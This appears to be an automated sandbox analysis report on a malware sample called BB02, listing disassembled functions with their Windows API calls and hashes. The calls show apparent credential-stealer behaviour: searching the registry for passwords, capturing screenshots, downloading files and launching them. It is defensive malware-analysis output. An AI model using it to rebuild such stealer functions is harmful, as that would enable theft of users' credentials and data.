Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6

Function 024EA2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 024EA2ED
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EA31A
lstrlen.KERNEL32(00639BD8), ref: 024EA327
lstrcpy.KERNEL32(00000000,00639BD8), ref: 024EA351
lstrlen.KERNEL32(00435210), ref: 024EA35C
lstrcpy.KERNEL32(00000000,00000000), ref: 024EA379
lstrcat.KERNEL32(00000000,00435210), ref: 024EA385
lstrcpy.KERNEL32(00000000,00000000), ref: 024EA3AB
lstrcat.KERNEL32(00000000,00000000), ref: 024EA3B6
lstrcpy.KERNEL32(00000000,00000000), ref: 024EA3DB
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 024EA3F6
LoadLibraryA.KERNEL32(00638D78), ref: 024EA40A

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction ID: b6e788c40d69c53a427ddac4383c65f1b4c6394a99f929db4c05f5d440852466
Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction Fuzzy Hash: D891AF70A00B219FEF209F65DC88AA737A6EF4470AB50541AE807877A1EBB5D941CFD1

Function 0040BCE9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
lstrlenA.KERNEL32(00000000), ref: 0040BD42
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
lstrlenA.KERNEL32(0043509C), ref: 0040BE13

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8

Function 024FEAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024FEB35
lstrcpy.KERNEL32(00000000,?), ref: 024FEB67
lstrcat.KERNEL32(?,00000000), ref: 024FEB73
lstrcat.KERNEL32(?,004354E4), ref: 024FEB8A
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024FEBF3
lstrcpy.KERNEL32(00000000,?), ref: 024FEC27
lstrcat.KERNEL32(?,00000000), ref: 024FEC33
lstrcat.KERNEL32(?,00435504), ref: 024FEC4A
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 024FECB8
lstrcpy.KERNEL32(00000000,?), ref: 024FECE9
lstrcat.KERNEL32(?,00000000), ref: 024FECF5
lstrcat.KERNEL32(?,00435518), ref: 024FED0C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction ID: a11a2aef6aa8bda2d380a0fc1b60ac4a910c7a0eb67b4da9ba5d4ecae8355f85
Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction Fuzzy Hash: 1D61D371644354AFE724EF70DC45FDE77A9AF88701F10881EBA8987190DBB4D608CBA6

Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418263
lstrlenA.KERNEL32(00000000), ref: 0041829C
lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
lstrlenA.KERNEL32(00000000), ref: 004182F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
lstrlenA.KERNEL32(00000000), ref: 00418344
lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
lstrlenA.KERNEL32(00000000), ref: 00418398
lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
lstrlenA.KERNEL32(00000000), ref: 004183E1
lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
strtok_s.MSVCRT ref: 0041842A

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4

Function 02504427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 025044CB
GetDesktopWindow.USER32 ref: 025044D5
GetWindowRect.USER32(00000000,?), ref: 025044E3
SelectObject.GDI32(00000000,00000000), ref: 0250451A
GetHGlobalFromStream.COMBASE(?,?), ref: 0250459C
GlobalLock.KERNEL32(?), ref: 025045A7
GlobalSize.KERNEL32(?), ref: 025045B6

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction ID: 9763361b9a9f992214f63a77ee96fff12404d859cb63952d0883f8ed4fefe60b
Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction Fuzzy Hash: 165108B1114340AFD710EF65DC88EAABBEAEF88715F00491DFA5583250DB74E905CFA2

Function 024FE327 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00638B0C), ref: 024FE394
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 024FE3BE
lstrcpy.KERNEL32(00000000,?), ref: 024FE3F6
lstrcat.KERNEL32(?,00000000), ref: 024FE404
lstrcat.KERNEL32(?,?), ref: 024FE41F
lstrcat.KERNEL32(?,?), ref: 024FE433
lstrcat.KERNEL32(?,00638A84), ref: 024FE447
lstrcat.KERNEL32(?,?), ref: 024FE45B
lstrcat.KERNEL32(?,00638AC8), ref: 024FE46E
lstrcpy.KERNEL32(00000000,?), ref: 024FE4A6
GetFileAttributesA.KERNEL32(00000000), ref: 024FE4AD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction ID: 123905a9823155998956d36bce1f1a5c15f8e22fda827ffba362f4eb85aa0810
Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction Fuzzy Hash: 976180B190012C9FDB54DF74CD44ADD77BAAF88301F1045AAEA49A3250DBB4AF84DF90

Function 00406A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
StrCmpCA.SHLWAPI(?,00A3FF70), ref: 00406A8A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
CloseHandle.KERNEL32(00000000), ref: 00406B50
InternetCloseHandle.WININET(00000000), ref: 00406B57
InternetCloseHandle.WININET(?), ref: 00406B61

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8

Function 024E6C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024E6CA6
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 024E6CD3
StrCmpCA.SHLWAPI(?,00638C80), ref: 024E6CF1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 024E6D11
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 024E6D2F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 024E6D48
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 024E6D6D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 024E6D97
CloseHandle.KERNEL32(00000000), ref: 024E6DB7
InternetCloseHandle.WININET(00000000), ref: 024E6DBE
InternetCloseHandle.WININET(?), ref: 024E6DC8

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction ID: 8deb58612ae626e6d11f39ed5a6e05057bd799e2712adbb2858ecc347d5975ca
Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction Fuzzy Hash: 17417CB1A00215AFEF20DF65DC49FAE77AEAF44705F504459FA06E7280DF70AA408BA4

Function 02504A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043573C,?,024F79A8), ref: 02504A6D
GetProcAddress.KERNEL32(00000000,00435748), ref: 02504A83
GetProcAddress.KERNEL32(00000000,00435750), ref: 02504A94
GetProcAddress.KERNEL32(00000000,0043575C), ref: 02504AA5
GetProcAddress.KERNEL32(00000000,00435768), ref: 02504AB6
GetProcAddress.KERNEL32(00000000,00435770), ref: 02504AC7
GetProcAddress.KERNEL32(00000000,0043577C), ref: 02504AD8
GetProcAddress.KERNEL32(00000000,00435784), ref: 02504AE9
GetProcAddress.KERNEL32(00000000,0043578C), ref: 02504AFA
GetProcAddress.KERNEL32(00000000,0043579C), ref: 02504B0B
GetProcAddress.KERNEL32(00000000,004357A8), ref: 02504B1C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction ID: 3603e6a5f670cfc35defad5edb260b17c7b1360ed75ad858980125cba6bde1d8
Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction Fuzzy Hash: 98117576951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4

Function 004180E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418105
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
strtok_s.MSVCRT ref: 0041820F

Strings

fplugins, xrefs: 004180E6
;B, xrefs: 004180F1, 00418209, 004180FB, 0041820C

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID: ;B$fplugins
API String ID: 3280532728-1193078497
Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94

Function 004079A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
Part of subcall function 00407710: strlen.MSVCRT ref: 00407840

lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
lstrcatA.KERNEL32(00000000,?), ref: 004079FD
lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
lstrcatA.KERNEL32(00000000,?), ref: 00407A30
wsprintfA.USER32 ref: 00407A50
lstrcpy.KERNEL32(00000000,?), ref: 00407A79
lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0

Strings

: , xrefs: 00407A09

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID: :
API String ID: 2460923012-3653984579
Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5

Function 024EBF50 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EBF76
lstrlen.KERNEL32(00000000), ref: 024EBFA9
lstrcpy.KERNEL32(00000000,00000000), ref: 024EBFD3
lstrcat.KERNEL32(00000000,00000000), ref: 024EBFDB
lstrcpy.KERNEL32(00000000,00000000), ref: 024EC003
lstrlen.KERNEL32(0043509C), ref: 024EC07A

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction ID: 5a4d36d519c200f7584d820da9286c42d24c664feda192ecd81d059015141fe9
Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction Fuzzy Hash: C2A14E70A012058FEF24DF69C988AAEB7F6AF4430AF14846BE80A97361DB75DC41CF50

Function 024FC7FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02507557: lstrcpy.KERNEL32(00000000), ref: 02507586
Part of subcall function 02507557: lstrcat.KERNEL32(00000000), ref: 02507592

lstrcpy.KERNEL32(00000000,?), ref: 024FC8F2
lstrcpy.KERNEL32(00000000,?), ref: 024FC91B
ShellExecuteEx.SHELL32(0000003C), ref: 024FC97B

Strings

(QC, xrefs: 024FC866
\TC, xrefs: 024FC968
XTC, xrefs: 024FC823
<, xrefs: 024FC93B
.dll, xrefs: 024FC7FC

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: (QC$.dll$<$XTC$\TC
API String ID: 3031569214-1251744519
Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction ID: 44471fe1ee7d61a4ffcb5fba9661a3ba4f02b2044617392ec43d27d758953562
Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction Fuzzy Hash: C9511B7190029A8FCB50EF79CCC099DBBB6AF88305F15487AD94AAB650DA34AD46CF44

Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
memset.MSVCRT ref: 00409ECF
LocalAlloc.KERNEL32(00000040), ref: 00409F07

